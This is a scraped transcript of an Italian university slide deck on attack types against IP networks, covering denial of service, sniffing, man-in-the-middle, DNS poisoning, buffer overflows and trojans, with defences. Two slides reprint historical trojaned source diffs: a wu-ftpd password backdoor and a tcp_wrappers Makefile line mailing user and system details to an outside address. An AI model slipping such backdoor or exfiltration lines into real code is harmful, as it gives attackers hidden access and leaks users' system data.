La presentazione è in caricamento. Aspetta per favore

La presentazione è in caricamento. Aspetta per favore

Claudio Telmon - Internet -1 © Claudio Telmon - 2000-2002 Tipologie di attacco su reti IP.

Presentazioni simili


Presentazione sul tema: "Claudio Telmon - Internet -1 © Claudio Telmon - 2000-2002 Tipologie di attacco su reti IP."— Transcript della presentazione:

1 Claudio Telmon - Internet -1 © Claudio Telmon - 2000-2002 Tipologie di attacco su reti IP

2 Claudio Telmon - Internet -2 © Claudio Telmon - 2000-2002 Tecniche di attacco Più passaggi prima del destinatario Più passaggi prima del destinatario Accesso da siti poco controllati Accesso da siti poco controllati Attraversamento di confini nazionali Attraversamento di confini nazionali Qui la polizia ha altro a cui pensare Qui la polizia ha altro a cui pensare

3 Claudio Telmon - Internet -3 © Claudio Telmon - 2000-2002 Social Engineering Si attacca lutente, che spesso è uno dei punti deboli delle difese di un sistema Si attacca lutente, che spesso è uno dei punti deboli delle difese di un sistema E` possibile soprattutto quando la politica di sicurezza non è ben definita E` possibile soprattutto quando la politica di sicurezza non è ben definita Non è possibile proteggersi con soli mezzi tecnici Non è possibile proteggersi con soli mezzi tecnici

4 Claudio Telmon - Internet -4 © Claudio Telmon - 2000-2002 Denial of Service Bloccare un servizio di ostacolo per la realizzazione di un altro tipo di attacco. Bloccare un servizio di ostacolo per la realizzazione di un altro tipo di attacco. Bloccare una macchina per poterne prendere il posto nelle comunicazioni con la macchina sotto attacco. Bloccare una macchina per poterne prendere il posto nelle comunicazioni con la macchina sotto attacco. Bloccare una macchina per causare un danno Bloccare una macchina per causare un danno

5 Claudio Telmon - Internet -5 © Claudio Telmon - 2000-2002 SYN flood Occupa lo spazio della memoria del kernel destinata ai buffer per le connessioni semiaperte Occupa lo spazio della memoria del kernel destinata ai buffer per le connessioni semiaperte Permette di impedire la ricezione di pacchetti SYN e RST (Mitnick) Permette di impedire la ricezione di pacchetti SYN e RST (Mitnick) Soluzioni: SYN cookies, uso di firewall Soluzioni: SYN cookies, uso di firewall

6 Claudio Telmon - Internet -6 © Claudio Telmon - 2000-2002 I Distributed Denial of Service È il tipo di problema che ha colpito Yahoo recentemente È il tipo di problema che ha colpito Yahoo recentemente Cè poco che le singole reti possano fare per proteggersi Cè poco che le singole reti possano fare per proteggersi Possono comunque salvaguardare le reti locali Possono comunque salvaguardare le reti locali Contatti preventivi con i provider possono aiutare Contatti preventivi con i provider possono aiutare

7 Claudio Telmon - Internet -7 © Claudio Telmon - 2000-2002 DDoS: possibili soluzioni Egress filtering: utile ma difficile da imporre Egress filtering: utile ma difficile da imporre Marcatura random dei pacchetti Marcatura random dei pacchetti Notifica del path dei pacchetti al destinatario con nuovi pacchetti icmp Notifica del path dei pacchetti al destinatario con nuovi pacchetti icmp Problemi di complessità, particolarmente quando gli IP mittenti e gli zombie sono molti Problemi di complessità, particolarmente quando gli IP mittenti e gli zombie sono molti

8 Claudio Telmon - Internet -8 © Claudio Telmon - 2000-2002 TCP/IPTCP/IP Packet storms Packet storms Difetti nello stack Difetti nello stack crash del sistema crash del sistema 100% cpu usage 100% cpu usage IP fragmentation: IP fragmentation: superamento dei meccanismi di filtraggio superamento dei meccanismi di filtraggio usato dagli scanner, poco implementato in attacchi specifici usato dagli scanner, poco implementato in attacchi specifici

9 Claudio Telmon - Internet -9 © Claudio Telmon - 2000-2002 Packet Sniffing I pacchetti attraversano parti di Internet sulle quali non si ha alcun controllo I pacchetti attraversano parti di Internet sulle quali non si ha alcun controllo Non è possibile sapere se un pacchetto è stato letto durante il percorso Non è possibile sapere se un pacchetto è stato letto durante il percorso Non è in generale possibile prevedere il percorso che seguiranno i pacchetti Non è in generale possibile prevedere il percorso che seguiranno i pacchetti Il percorso spesso attraversa i confini nazionali Il percorso spesso attraversa i confini nazionali

10 Claudio Telmon - Internet -10 © Claudio Telmon - 2000-2002 Switch e VLAN Sono strumenti nati per gestire le reti e ottimizzare luso delle risorse Sono strumenti nati per gestire le reti e ottimizzare luso delle risorse Esistono attacchi efficaci contro molti modelli di switch e contro molte implementazioni di vlan Esistono attacchi efficaci contro molti modelli di switch e contro molte implementazioni di vlan Es: si inonda lo switch di pacchetti con MAC address falsi, fino a riempirne la cache... Es: si inonda lo switch di pacchetti con MAC address falsi, fino a riempirne la cache...

11 Claudio Telmon - Internet -11 © Claudio Telmon - 2000-2002 Redirezione dei pacchetti I protocolli di routing di Internet prevedono una grande facilità nella ridirezione dei pacchetti I protocolli di routing di Internet prevedono una grande facilità nella ridirezione dei pacchetti E` possibile estrarre pacchetti da una sottorete in modo trasparente E` possibile estrarre pacchetti da una sottorete in modo trasparente I nuovi protocolli di routing prevedono unautenticazione migliore fra le parti I nuovi protocolli di routing prevedono unautenticazione migliore fra le parti

12 Claudio Telmon - Internet -12 © Claudio Telmon - 2000-2002 Man in the Middle Consiste nel modificare i pacchetti in transito nel nodo in modo trasparente Consiste nel modificare i pacchetti in transito nel nodo in modo trasparente Permette di impersonare completamente una delle parti Permette di impersonare completamente una delle parti Permette di assumere il controllo di una connessione dopo lautenticazione iniziale Permette di assumere il controllo di una connessione dopo lautenticazione iniziale

13 Claudio Telmon - Internet -13 © Claudio Telmon - 2000-2002 Connection hijacking La connessione è composta da più scambi di messaggi La connessione è composta da più scambi di messaggi Lautenticazione avviene durante il primo scambio Lautenticazione avviene durante il primo scambio I messaggi successivi non vengono autenticati I messaggi successivi non vengono autenticati Quindi la connessione viene attaccata dopo lautenticazione iniziale Quindi la connessione viene attaccata dopo lautenticazione iniziale

14 Claudio Telmon - Internet -14 © Claudio Telmon - 2000-2002 Replay attack Consiste nel ripetere una sequenza di operazioni corrispondente a una sessione appena conclusa Consiste nel ripetere una sequenza di operazioni corrispondente a una sessione appena conclusa Non è necessario comprendere il significato di ciò che si sta facendo Non è necessario comprendere il significato di ciò che si sta facendo

15 Claudio Telmon - Internet -15 © Claudio Telmon - 2000-2002 Il DNS Le risposte a richieste DNS sono sostanzialmente non autenticate Le risposte a richieste DNS sono sostanzialmente non autenticate È possibile aggiungere informazioni false a query legittime (cache corruption) È possibile aggiungere informazioni false a query legittime (cache corruption) I meccanismi di log generalmente prevedono la risoluzione dei nomi... I meccanismi di log generalmente prevedono la risoluzione dei nomi... Il double reverse lookup offre qualche protezione in più Il double reverse lookup offre qualche protezione in più

16 Claudio Telmon - Internet -16 © Claudio Telmon - 2000-2002 ProxyProxy Un semplice proxy tcp installato su un sistema win95: Un semplice proxy tcp installato su un sistema win95: non viene notato dallutente non viene notato dallutente non genera log non genera log attribuisce le azioni allutente attribuisce le azioni allutente Un proxy reale configurato male permette: Un proxy reale configurato male permette: lutilizzo da parte di utenti non locali lutilizzo da parte di utenti non locali laccesso a servizi critici (telnet ecc.) laccesso a servizi critici (telnet ecc.)

17 Claudio Telmon - Internet -17 © Claudio Telmon - 2000-2002 Vulnerabilità dei servizi

18 Claudio Telmon - Internet -18 © Claudio Telmon - 2000-2002 Password in chiaro Molti servizi trasmettono password in chiaro: Molti servizi trasmettono password in chiaro: telnet telnet ftp ftp pop pop

19 Claudio Telmon - Internet -19 © Claudio Telmon - 2000-2002 Password Guessing Le password sono spesso scelte in modo prevedibile Le password sono spesso scelte in modo prevedibile Con gli strumenti attuali è possibile provare alcuni milioni di password in poche ore Con gli strumenti attuali è possibile provare alcuni milioni di password in poche ore Vi sono comunque dei limiti intrinseci alle capacità mnemoniche umane Vi sono comunque dei limiti intrinseci alle capacità mnemoniche umane

20 Claudio Telmon - Internet -20 © Claudio Telmon - 2000-2002 Errori nelle applicazioni I dati ricevuti e trasmessi sono gestiti da applicazioni I dati ricevuti e trasmessi sono gestiti da applicazioni Come tutto il software, anche queste applicazioni possono avere errori Come tutto il software, anche queste applicazioni possono avere errori Come tutti i servizi, possono essere configurate male Come tutti i servizi, possono essere configurate male

21 Claudio Telmon - Internet -21 © Claudio Telmon - 2000-2002 Ogni programma ha dei difetti Ogni programma ha dei difetti Molti di questi difetti possono essere sfruttati per eseguire azioni non previste Molti di questi difetti possono essere sfruttati per eseguire azioni non previste I difetti in programmi critici per la sicurezza permettono di eseguire azioni critiche per la sicurezza I difetti in programmi critici per la sicurezza permettono di eseguire azioni critiche per la sicurezza Difetti del software

22 Claudio Telmon - Internet -22 © Claudio Telmon - 2000-2002 Difetti nei protocolli Molti protocolli sono stati progettati senza considerare la sicurezza Molti protocolli sono stati progettati senza considerare la sicurezza risalgono a parecchi anni fa risalgono a parecchi anni fa derivano da unottica host derivano da unottica host sono progettati in proprio senza le competenze necessarie sono progettati in proprio senza le competenze necessarie La sicurezza verrà aggiunta dopo La sicurezza verrà aggiunta dopo

23 Claudio Telmon - Internet -23 © Claudio Telmon - 2000-2002 Difetti realizzativi Pochi programmatori sanno come evitare i trabocchetti Pochi programmatori sanno come evitare i trabocchetti Ci si aspetta che la controparte (client/server) si comporti correttamente Ci si aspetta che la controparte (client/server) si comporti correttamente Le rifiniture andranno nella versione definitiva Le rifiniture andranno nella versione definitiva Semplici errori Semplici errori

24 Claudio Telmon - Internet -24 © Claudio Telmon - 2000-2002 Difetti di configurazione Una configurazione sicura è più scomoda da usare Una configurazione sicura è più scomoda da usare La configurazione di default spesso serve a far funzionare tutto subito La configurazione di default spesso serve a far funzionare tutto subito La scelta fra le opzioni può non essere chiara allutente/sistemista La scelta fra le opzioni può non essere chiara allutente/sistemista Configurazioni temporanee Configurazioni temporanee Errori Errori

25 Claudio Telmon - Internet -25 © Claudio Telmon - 2000-2002 Perché i server Gli attacchi ai server sono sempre stati i più comuni: Gli attacchi ai server sono sempre stati i più comuni: i server non erano molto sicuri i server non erano molto sicuri attendono connessioni da chiunque in ogni momento attendono connessioni da chiunque in ogni momento la maggior parte delle macchine ha dei server attivi la maggior parte delle macchine ha dei server attivi

26 Claudio Telmon - Internet -26 © Claudio Telmon - 2000-2002 Perché i client I server sono meglio gestiti I server sono meglio gestiti Il traffico è loggato Il traffico è loggato La qualità migliora La qualità migliora I client sono gestiti dagli utenti I client sono gestiti dagli utenti La qualità è peggiore La qualità è peggiore Non vengono aggiornati Non vengono aggiornati Non sono loggati Non sono loggati

27 Claudio Telmon - Internet -27 © Claudio Telmon - 2000-2002 I browser La qualità aumenta La qualità aumenta Le funzionalità di più Le funzionalità di più Le operazioni devono essere trasparenti…. Le operazioni devono essere trasparenti…. Integrano funzionalità diverse, anche locali Integrano funzionalità diverse, anche locali la distinzione fra Internet e la rete locale è sempre più sfumata la distinzione fra Internet e la rete locale è sempre più sfumata Spesso le cose interessanti sono comunque tutte nel browser Spesso le cose interessanti sono comunque tutte nel browser

28 Claudio Telmon - Internet -28 © Claudio Telmon - 2000-2002 Input validation Non bisogna fare assunzioni su cosa ci può arrivare dalla rete Non bisogna fare assunzioni su cosa ci può arrivare dalla rete può arrivare di tutto può arrivare di tutto dobbiamo verificare che corrisponda alla sintassi desiderata dobbiamo verificare che corrisponda alla sintassi desiderata lattaccante non usa il nostro client, genera il traffico che vuole lattaccante non usa il nostro client, genera il traffico che vuole Errori di questo tipo (realizzativi o di progettazione) sono alla base della maggior parte dei problemi Errori di questo tipo (realizzativi o di progettazione) sono alla base della maggior parte dei problemi

29 Claudio Telmon - Internet -29 © Claudio Telmon - 2000-2002 Campo 1Campo 2 Dati dalla rete (anche elaborati) Campo 1Campo 2 Buffer overflows

30 Claudio Telmon - Internet -30 © Claudio Telmon - 2000-2002 Tipologie di overflow Strutture (riscrittura di dati interni) Strutture (riscrittura di dati interni) Stack (riscrittura di puntatori e codice) Stack (riscrittura di puntatori e codice) Heap (riscrittura di puntatori e codice) Heap (riscrittura di puntatori e codice)

31 Claudio Telmon - Internet -31 © Claudio Telmon - 2000-2002 Interazione con lambiente Le variabili dambiente possono influire sul comportamento Le variabili dambiente possono influire sul comportamento PATH PATH LD_PATH LD_PATH Alcune funzioni hanno un comportamento poco prevedibile Alcune funzioni hanno un comportamento poco prevedibile system() system()

32 Claudio Telmon - Internet -32 © Claudio Telmon - 2000-2002 Race conditions Un programma vuole creare un file in una directory condivisa (es. temp o tmp) Un programma vuole creare un file in una directory condivisa (es. temp o tmp) Un altro programma crea il file prima di lui… Un altro programma crea il file prima di lui… Soluzioni dipendenti dal sistema Soluzioni dipendenti dal sistema

33 Claudio Telmon - Internet -33 © Claudio Telmon - 2000-2002 Riuso delle risorse Lallocazione di memoria generalmente azzera la memoria allocata Lallocazione di memoria generalmente azzera la memoria allocata Accesso diretto alla memoria fisica Accesso diretto alla memoria fisica File di swap File di swap File temporanei File temporanei Core dump (di programmi suid) Core dump (di programmi suid)

34 Claudio Telmon - Internet -34 © Claudio Telmon - 2000-2002 Virus: quando eseguito, copia il proprio codice su altri programmi Virus: quando eseguito, copia il proprio codice su altri programmi Worm: quando eseguito, installa copie del proprio codice su altri computer in rete Worm: quando eseguito, installa copie del proprio codice su altri computer in rete Trojan Horse: ha una funzione evidente e una occulta Trojan Horse: ha una funzione evidente e una occulta Virus, worm e trojan horse

35 Claudio Telmon - Internet -35 © Claudio Telmon - 2000-2002 Trojan Horse Sono programmi che hanno: Sono programmi che hanno: una funzione evidente (quella per cui li usa la vittima) una funzione evidente (quella per cui li usa la vittima) una funzione nascosta (quella per cui sono stati creati) una funzione nascosta (quella per cui sono stati creati) Possono essere creati ad hoc o modifiche di programmi esistenti Possono essere creati ad hoc o modifiche di programmi esistenti

36 Claudio Telmon - Internet -36 © Claudio Telmon - 2000-2002 Back Orifice/ BO2K Si installa in modo invisibile allutente Si installa in modo invisibile allutente Permette il controllo e monitoraggio remoto del sistema Permette il controllo e monitoraggio remoto del sistema È un ottimo tool di amministrazione remota... È un ottimo tool di amministrazione remota...

37 Claudio Telmon - Internet -37 © Claudio Telmon - 2000-2002 Trojan horse: oggetti complessi? Spesso basta modificare il risultato di un if() Spesso basta modificare il risultato di un if() Un piccolo demone sono poche righe di codice Un piccolo demone sono poche righe di codice Più sono semplici e più sono difficili da individuare Più sono semplici e più sono difficili da individuare

38 Claudio Telmon - Internet -38 © Claudio Telmon - 2000-2002 1013,1015c1013,1014 pw_passwd == '\0' || pw_passwd)) && < (strcmp(passwd, "NULL"))) { - --- pw_passwd == '\0' || pw_passwd)) { Esempio: wu-ftpd Inserito nel circuito di distribuzione ufficiale (luglio 94) Inserito nel circuito di distribuzione ufficiale (luglio 94)

39 Claudio Telmon - Internet -39 © Claudio Telmon - 2000-2002 *** 7.6/Makefile Mon Apr 7 20:34:16 1997 --- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997 *************** *** 26,31 **** --- 26,32 ---- @echo @echo "If none of these match your environment, edit the system" @echo "dependencies sections in the Makefile and do a 'make other'."+ @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com @echo Esempio: tcp-wrapper Inserito nel sito originale della distribuzione (gennaio 99) Inserito nel sito originale della distribuzione (gennaio 99)

40 Claudio Telmon - Internet -40 © Claudio Telmon - 2000-2002 Riuso delle risorse Lallocazione di memoria generalmente azzera la memoria allocata Lallocazione di memoria generalmente azzera la memoria allocata Accesso diretto alla memoria fisica Accesso diretto alla memoria fisica File di swap File di swap File temporanei File temporanei Core dump (di programmi suid) Core dump (di programmi suid)

41 Claudio Telmon - Internet -41 © Claudio Telmon - 2000-2002 Esempi: Office Numerosi casi di riutilizzo della memoria senza cancellazione Numerosi casi di riutilizzo della memoria senza cancellazione Word & C: esame del documento con text editor Word & C: esame del documento con text editor

42 Claudio Telmon - Internet -42 © Claudio Telmon - 2000-2002 Vulnerabilità dei servizi Web Cattiva configurazione del server Cattiva configurazione del server è il problema più semplice da risolvere è il problema più semplice da risolvere Interazione del server con il sistema Interazione del server con il sistema tipico dei sistemi WindowsNT tipico dei sistemi WindowsNT Difetti del server Difetti del server Cross site scripting Cross site scripting tipico dei provider tipico dei provider è un problema per i client più che per i server è un problema per i client più che per i server

43 Claudio Telmon - Internet -43 © Claudio Telmon - 2000-2002 Quali sistemi? Per rendere sicuro un sistema bisogna conoscerlo bene Per rendere sicuro un sistema bisogna conoscerlo bene Spesso si deve lavorare con quello che si ha a disposizione Spesso si deve lavorare con quello che si ha a disposizione


Scaricare ppt "Claudio Telmon - Internet -1 © Claudio Telmon - 2000-2002 Tipologie di attacco su reti IP."

Presentazioni simili


Annunci Google